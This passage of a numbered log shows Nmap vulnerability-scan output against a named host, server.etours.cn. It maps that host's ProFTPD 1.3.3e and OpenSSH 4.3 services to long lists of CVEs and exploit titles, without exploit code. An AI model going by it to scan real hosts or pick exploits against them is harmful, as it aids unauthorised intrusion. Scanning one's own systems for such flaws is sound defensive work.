  1685. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  1686. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  1687. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  1688. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  1689. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  1690. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  1691. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  1692. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  1693. |
  1694. | OpenVAS (Nessus) - http://www.openvas.org:
  1695. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1696. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  1697. |
  1698. | SecurityTracker - https://www.securitytracker.com:
  1699. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  1700. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  1701. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  1702. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  1703. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  1704. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  1705. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  1706. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  1707. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  1708. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  1709. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  1710. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  1711. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  1712. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  1713. |
  1714. | OSVDB - http://www.osvdb.org:
  1715. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  1716. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  1717. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  1718. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  1719. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  1720. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  1721. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  1722. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  1723. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  1724. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  1725. | [57310] ProFTPD Multiple Unspecified Overflows
  1726. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  1727. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  1728. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  1729. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  1730. | [57305] ProFTPD src/main.c Unspecified Overflow
  1731. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  1732. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  1733. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  1734. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  1735. | [51849] ProFTPD Character Encoding SQL Injection
  1736. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  1737. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  1738. | [48411] ProFTPD FTP Command Truncation CSRF
  1739. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  1740. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  1741. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  1742. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  1743. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  1744. | [23063] ProFTPD mod_radius Password Overflow DoS
  1745. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  1746. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  1747. | [18270] ProFTPD ftpshut Shutdown Message Format String
  1748. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  1749. | [10769] ProFTPD File Transfer Newline Character Overflow
  1750. | [10768] ProFTPD STAT Command Remote DoS
  1751. | [10758] ProFTPD Login Timing Account Name Enumeration
  1752. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  1753. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  1754. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  1755. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  1756. | [7165] ProFTPD USER Command Memory Leak DoS
  1757. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  1758. | [5705] ProFTPD Malformed cwd Command Format String
  1759. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  1760. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  1761. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  1762. |_
  1763. Service Info: OS: Unix
  1764.  
  1765. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1766. Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
  1767.  
  1768.  
  1769. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p22 184.154.192.250
  1770. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:28 CST
  1771. Nmap scan report for server.etours.cn (184.154.192.250)
  1772. Host is up (0.037s latency).
  1773.  
  1774. PORT STATE SERVICE VERSION
  1775. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1776. | vulscan: VulDB - https://vuldb.com:
  1777. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  1778. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  1779. | [43307] OpenSSH 4.0 unknown vulnerability
  1780. | [41835] OpenSSH up to 4.8 unknown vulnerability
  1781. | [38743] OpenSSH up to 4.6 unknown vulnerability
  1782. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  1783. | [32699] OpenBSD OpenSSH 4.1 denial of service
  1784. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  1785. |
  1786. | MITRE CVE - https://cve.mitre.org:
  1787. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  1788. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  1789. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  1790. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  1791. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  1792. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  1793. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  1794. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  1795. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  1796. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  1797. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  1798. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  1799. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  1800. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  1801. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  1802. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  1803. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  1804. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  1805. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  1806. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  1807. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  1808. |
  1809. | SecurityFocus - https://www.securityfocus.com/bid/:
  1810. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1811. |
  1812. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1813. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  1814. |
  1815. | Exploit-DB - https://www.exploit-db.com:
  1816. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  1817. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1818. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  1819. |
  1820. | OpenVAS (Nessus) - http://www.openvas.org:
  1821. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  1822. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  1823. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  1824. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  1825. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  1826. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  1827. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  1828. | [861813] Fedora Update for openssh FEDORA-2010-5429
  1829. | [861319] Fedora Update for openssh FEDORA-2007-395
  1830. | [861170] Fedora Update for openssh FEDORA-2007-394
  1831. | [861012] Fedora Update for openssh FEDORA-2007-715
  1832. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  1833. | [840300] Ubuntu Update for openssh update USN-612-5
  1834. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  1835. | [840268] Ubuntu Update for openssh update USN-612-7
  1836. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  1837. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  1838. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  1839. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  1840. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  1841. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  1842. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  1843. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  1844. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  1845. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  1846. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  1847. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  1848. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  1849. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  1850. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  1851. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  1852. | [65987] SLES10: Security update for OpenSSH
  1853. | [65819] SLES10: Security update for OpenSSH
  1854. | [65514] SLES9: Security update for OpenSSH
  1855. | [65513] SLES9: Security update for OpenSSH
  1856. | [65334] SLES9: Security update for OpenSSH
  1857. | [65248] SLES9: Security update for OpenSSH
  1858. | [65218] SLES9: Security update for OpenSSH
  1859. | [65169] SLES9: Security update for openssh,openssh-askpass
  1860. | [65126] SLES9: Security update for OpenSSH
  1861. | [65019] SLES9: Security update for OpenSSH
  1862. | [65015] SLES9: Security update for OpenSSH
  1863. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  1864. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  1865. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  1866. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  1867. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  1868. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  1869. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  1870. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  1871. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  1872. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  1873. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  1874. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  1875. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  1876. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  1877. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  1878. | [57470] FreeBSD Ports: openssh
  1879. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  1880. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  1881. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  1882. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  1883. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  1884. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  1885. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  1886. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  1887. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  1888. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  1889. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  1890. | [10883] OpenSSH Channel Code Off by 1
  1891. | [10823] OpenSSH UseLogin Environment Variables
  1892. |
  1893. | SecurityTracker - https://www.securitytracker.com:
  1894. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  1895. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  1896. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  1897. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  1898. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  1899. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  1900. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  1901. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  1902. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  1903. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  1904. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  1905. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  1906. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  1907. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  1908. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  1909. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  1910. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  1911. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  1912. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  1913. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  1914. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  1915. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  1916. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  1917. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  1918. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  1919. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  1920. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  1921. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  1922. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  1923. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
  1924. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  1925. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  1926. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  1927. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  1928. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  1929. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  1930. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  1931. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  1932. |
  1933. | OSVDB - http://www.osvdb.org:
  1934. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  1935. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  1936. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  1937. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  1938. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  1939. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  1940. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  1941. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  1942. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  1943. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  1944. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  1945. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  1946. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  1947. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  1948. | [56921] OpenSSH Unspecified Remote Compromise
  1949. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  1950. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  1951. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  1952. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  1953. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  1954. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  1955. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  1956. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  1957. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  1958. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  1959. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  1960. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  1961. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  1962. | [34601] OPIE w/ OpenSSH Account Enumeration
  1963. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  1964. | [32721] OpenSSH Username Password Complexity Account Enumeration
  1965. | [30232] OpenSSH Privilege Separation Monitor Weakness
  1966. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  1967. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  1968. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  1969. | [29152] OpenSSH Identical Block Packet DoS
  1970. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  1971. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  1972. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  1973. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  1974. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  1975. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  1976. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  1977. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  1978. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  1979. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  1980. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  1981. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  1982. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  1983. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  1984. | [6072] OpenSSH PAM Conversation Function Stack Modification
  1985. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  1986. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  1987. | [5408] OpenSSH echo simulation Information Disclosure
  1988. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  1989. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  1990. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  1991. | [3456] OpenSSH buffer_append_space() Heap Corruption
  1992. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  1993. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  1994. | [2112] OpenSSH Reverse DNS Lookup Bypass
  1995. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  1996. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  1997. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  1998. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  1999. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2000. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2001. | [642] OpenSSH Multiple Key Type ACL Bypass
  2002. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2003. | [341] OpenSSH UseLogin Local Privilege Escalation
  2004. |_
  2005.  
  2006. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2007. Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds
  2008.  
  2009.  
  2010. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p21 184.154.192.250
  2011. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:29 CST
  2012. Nmap scan report for server.etours.cn (184.154.192.250)
  2013. Host is up (0.14s latency).
  2014.  
  2015. PORT STATE SERVICE VERSION
  2016. 21/tcp open ftp ProFTPD 1.3.3e
  2017. | vulscan: VulDB - https://vuldb.com:
  2018. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  2019. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  2020. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  2021. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  2022. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  2023. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  2024. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  2025. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  2026. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  2027. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  2028. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  2029. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  2030. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  2031. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  2032. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  2033. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  2034. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  2035. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  2036. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  2037. |
  2038. | MITRE CVE - https://cve.mitre.org:
